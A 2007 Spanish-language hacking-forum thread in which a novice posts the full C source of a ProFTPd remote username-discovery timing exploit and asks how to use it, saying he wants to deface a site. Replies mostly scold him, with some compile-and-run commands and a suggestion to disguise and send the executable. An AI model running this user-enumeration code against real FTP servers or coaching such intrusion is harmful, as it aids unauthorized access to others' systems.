hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
15 de Octubre de 2008, 09:13:15
Noticias: Participa en el batch lab de CPH
Para ver este enlace Registrate o Inicia Sesion
aqui

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderador: vengador de las sombras)
| | |-+  Ya copile el exploit, ahora que????
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 2 [Todos] Ir Abajo Imprimir
Autor Tema: Ya copile el exploit, ahora que????  (Leído 1259 veces)
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« : 20 de Febrero de 2007, 09:24:24 »

Bueno ya copile el exploit y ahora ke ago? e leido en todo el foro y no encuentro nada! me e leido el manual de copilacion de ozx y solo aprendi a copilarlo pero despues ke lo copilo ke sigue??

miren este fue el exploit ke copile! lo sake de securitifocus

Código:
// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic // http://www.lss.hr

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
  int sock,n,y;
  long dist,stat=0;
  struct sockaddr_in sin;
  char buf[1024], buf2[1024];
  struct timeval tv, tv2;
  struct timezone tz, tz2;

  printf ("Proftpd remote users discovery exploit\n"
          " Coded by Leon / LSS Security\n"
          ">-------------------------------------<\n");

  if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }
 
  sock = socket (AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_port = htons (PORT);
  sin.sin_addr.s_addr = inet_addr (argv[1]);
  bzero (sin.sin_zero,8);

  connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

  printf ("Login time: ");
  n = read (sock,buf2, sizeof(buf2));
  for (y=0;y<PROBE;y++) {
     gettimeofday (&tv,&tz);
     snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
     write (sock, buf, strlen(buf));
     n = read (sock,buf2, sizeof(buf2));
     gettimeofday (&tv2,&tz2);
     dist =tv2.tv_usec - tv.tv_usec;
     stat += dist;
     printf (" %d |",dist);
  }
  printf ("\nAvrg: %d\n",(stat/PROBE));
  close (sock);
}

Cualkier ayuda me caeria bien!

En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
N0Z3LF
NZ1
*
Desconectado Desconectado

Mensajes: 56


[D.O.S] Hack Team Owner!


Ver Perfil
« Respuesta #1 : 20 de Febrero de 2007, 05:03:58 »

ProFTPd remote users discovery based on code execution time

creo que eso lo explica o no?
En línea


Para ver este enlace Registrate o Inicia Sesion
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« Respuesta #2 : 20 de Febrero de 2007, 07:28:29 »

ya copile el exploit lo ke kiero es Usarlo! ocea ke sigue ya lo copile ahora ke?
En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
OzX
Visitante
« Respuesta #3 : 20 de Febrero de 2007, 07:36:37 »

leer bien el manual y no hacer cosas q no tienes mucha la idea...

el compilar que creas? un exe.. este exe tiene que ser executado.
ve bien el manual.
En línea
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« Respuesta #4 : 20 de Febrero de 2007, 08:27:43 »

el manual lo e leido 5 veces! y si cree un exe pero como lo ejecuto?
dos click?
dime! plisss Embarrassed Embarrassed
En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
codebreak
NZ1
*
Desconectado Desconectado

Mensajes: 63



Ver Perfil WWW
« Respuesta #5 : 20 de Febrero de 2007, 08:40:55 »

el manual lo e leido 5 veces! y si cree un exe pero como lo ejecuto?
dos click?
dime! plisss Embarrassed Embarrassed

Para que quieres ejecutar un exploit y abusar de algún bug, si ni siquiera tienes un conocimiento básico de DOS.

Mejor aprende lo básico antes de tirarte a abusar bugs...
Para que lo quieres aprovechar... en el mejor de los casos te devuelve una shell root... y si no sabes DOS, como piensas sacarle algún provecho.

No seas flojo y lee.

Saludos,
En línea



Para ver este enlace Registrate o Inicia Sesion
www.codebreak. tk
W4ck1ng Team Member[/center]
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« Respuesta #6 : 20 de Febrero de 2007, 08:51:33 »

en teoria me sujieres ke aprenda ke es dos??

pero pasame un link por ke google silo abla de el ms-dos de windows
En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
Netstat
Recien llegado
*
Desconectado Desconectado

Mensajes: 14



Ver Perfil
« Respuesta #7 : 20 de Febrero de 2007, 09:28:19 »

Bueno, lo que yo entendí en el manual de OzX es que ya estando en la carpeta (esto lo sace del manual)
ya estando en la carpeta

C:\cygwin\bin\gcc exploit.c -o exploit.exe

C:\cygwin\bin\exploit (será ejecutado en la consola)

Y te saldrá las opciones del exploit. Si estoy mal porfa ubicenme yo eso entendí.
En línea
codebreak
NZ1
*
Desconectado Desconectado

Mensajes: 63



Ver Perfil WWW
« Respuesta #8 : 20 de Febrero de 2007, 10:27:03 »

en teoria me sujieres ke aprenda ke es dos??

pero pasame un link por ke google silo abla de el ms-dos de windows

No seas flojo.
Para la próxima busca bien e informate solo. MS-DOS es la versión de DOS utilizada por microsoft en Windows....

Donde encuentras manuales de aquello?.
En este foro...

Te reto a encontrar el enlace.

Saludos,

PS: Si no te ayudas solo, como piensas que los demas van a querer...
En línea



Para ver este enlace Registrate o Inicia Sesion
www.codebreak. tk
W4ck1ng Team Member[/center]
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« Respuesta #9 : 21 de Febrero de 2007, 07:27:04 »

No seas flojo.
Para la próxima busca bien e informate solo. MS-DOS es la versión de DOS utilizada por microsoft en Windows....

Donde encuentras manuales de aquello?.
En este foro...

Te reto a encontrar el enlace.

Saludos,

Tedigo ke no encuentro nada! solo me habla de microsoft dse cuando inicio bla,bla,bla... yo kiero ke me des el link de la presisa informacion ke devo saver de "DoS" para hacer mi primer deface con Exploit_!

PS: Si no te ayudas solo, como piensas que los demas van a querer...
En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« Respuesta #10 : 21 de Febrero de 2007, 07:50:02 »

DoS / Denegación de servicios: Es un ataque, causado en ocasiones por los virus, que evita al usuario la utilización de ciertos servicios (del sistema operativo, de servidores Web, etc).



Eso es dos no???
En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
OzX
Visitante
« Respuesta #11 : 21 de Febrero de 2007, 07:58:01 »

si.
pero code se referia a MSDOS.
En línea
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« Respuesta #12 : 21 de Febrero de 2007, 08:02:02 »

Ozx no se si me doy a explicar!

lo ke kiero es saver presisamente lo ke me falta! ocea kiero saver ke es lo ke tengo ke aprender para poder seguir asia delante.
En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
OzX
Visitante
« Respuesta #13 : 21 de Febrero de 2007, 08:50:05 »

primeramente saber en k lenguaje esta dicho exploiits o en general e intentar aprender sonbre este lenguaje.. con eso lo demas ya vendra solo Cheesy
En línea
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« Respuesta #14 : 25 de Febrero de 2007, 01:43:04 »

ok estoi aprendiendo C.!
En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
Celcius
NZ1
*
Desconectado Desconectado

Mensajes: 72



Ver Perfil
« Respuesta #15 : 25 de Febrero de 2007, 02:04:02 »

Bueno si.........

Si lees el manual,notaras que el .exe deberas camuflajearlo. . para luego enviarlo.

pero debes leer el manual,y aprender ALGO DE MS-DOS.

No es tan dificil Wink
En línea

OzX
Visitante
« Respuesta #16 : 25 de Febrero de 2007, 04:14:40 »

un excelente comienzo Cheesy ojala todos se animen a lo mismo Cheesy
En línea
flasher
NZ1
*
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #17 : 26 de Febrero de 2007, 06:46:18 »

yo no lo entiendo muy bien, perdonad mi ignorancia.
Si el exploit se compila a raiz de encontrar las bulneravilidad es de un sistema, ¿hay que enviarlo a ese sistema? yo pensaba que se ejecutaba desde el equipo atacante, si no, un exploit viene a ser un troyano pero especifico para un equipo, no?
gracias.
En línea
you_know
NZ2
**
Desconectado Desconectado

Mensajes: 163


...


Ver Perfil WWW
« Respuesta #18 : 26 de Febrero de 2007, 06:55:06 »

yo no lo entiendo muy bien, perdonad mi ignorancia.
Si el exploit se compila a raiz de encontrar las bulneravilidad es de un sistema, ¿hay que enviarlo a ese sistema? yo pensaba que se ejecutaba desde el equipo atacante, si no, un exploit viene a ser un troyano pero especifico para un equipo, no?
gracias.


Te recomiendo ke hagas lo ke estoi haciendo!

1rº- leete un manual de Ms-DoS (en google hay miles!!)

2dº- Aprender el lewnguaje en ke esta el exploit (toi aprendiendo C casi todos son en C!)
En línea


Para ver este enlace Registrate o Inicia Sesion

User at Milw0rm
flasher
NZ1
*
Desconectado Desconectado

Mensajes: 25


Ver Perfil
« Respuesta #19 : 26 de Febrero de 2007, 10:38:57 »

hola,
agradezco tu respuesta y eso es lo que haré, pero ¿podrías decirme si estoy en lo cierto?¿el exploit tiene que ser ejecutado en el equipo victima?
gracias
En línea
OzX
Visitante
« Respuesta #20 : 27 de Febrero de 2007, 04:40:37 »

hola,
agradezco tu respuesta y eso es lo que haré, pero ¿podrías decirme si estoy en lo cierto?¿el exploit tiene que ser ejecutado en el equipo victima?
gracias

depende si es un exploit locao o remoto.
En línea
meilyn
Recien llegado
*
Desconectado Desconectado

Mensajes: 1


Ver Perfil
« Respuesta #21 : 30 de Marzo de 2007, 09:46:43 »

Smiley Me van a disculpar pero me suscribí a esta página para ver si ustedes prestan la ayuda correspondient e y por lo que leo solo tratan de fastidiar a los usuarios y no prestan ninguna ayuda
En línea
abdelali
Recien llegado
*
Desconectado Desconectado

Mensajes: 18


Ver Perfil
« Respuesta #22 : 31 de Marzo de 2007, 04:22:10 »

Cuando se copila un exploit se va a Donde esta el Exe con Cmd luego se escribe exploit en la cosola y se ejecuta el exploit dandote la informacion que le debes dar para poder entrar en dicho sitio te pedira ej. el path type host etc.
En línea
Páginas: 1 2 [Todos] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online